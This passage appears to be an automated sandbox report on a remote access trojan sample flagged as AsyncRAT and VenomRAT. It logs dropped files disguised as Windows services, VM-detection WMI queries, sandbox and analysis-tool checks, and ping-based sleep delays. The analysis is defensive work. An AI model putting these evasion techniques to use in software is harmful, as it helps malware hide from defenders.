                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Yara detected AsyncRAT
                            Source: Yara matchFile source: 0.2.BTC.exe.2c8fa48.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.0.Cracked.exe.d80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.Cracked.exe.310b0a8.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.BTC.exe.2c8fa48.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.Cracked.exe.310b0a8.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000003.00000002.2039417306.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000000.2004809524.0000000000D82000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: update.exe PID: 1632, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Cracked.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                            Yara detected VenomRAT
                            Source: Yara matchFile source: Process Memory Space: Cracked.exe PID: 5524, type: MEMORYSTR
                            Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                            Source: Cracked.exe, 00000003.00000002.2039417306.00000000034AC000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000002.2039417306.0000000003051000.00000004.00000800.00020000.00000000.sdmp, Windows Security Health Service.exe, 0000001A.00000002.4466271061.0000000002CA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                            Source: svchost.exe, 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, update.exe, 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, update.exe.0.dr, svchost.exe.0.drBinary or memory string: SBIEDLL.DLL
                            Source: BTC.exe, 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000002.2039417306.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000000.2004809524.0000000000D82000.00000002.00000001.01000000.00000007.sdmp, Cracked.exe.0.dr, Windows Security Health Service.exe.3.drBinary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
                            Uses ping.exe to sleep
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
                            Source: C:\Users\user\Desktop\BTC.exeMemory allocated: 2990000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeMemory allocated: 1AC50000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeMemory allocated: CB0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeMemory allocated: 2850000 memory reserve | memory write watchJump to behavior
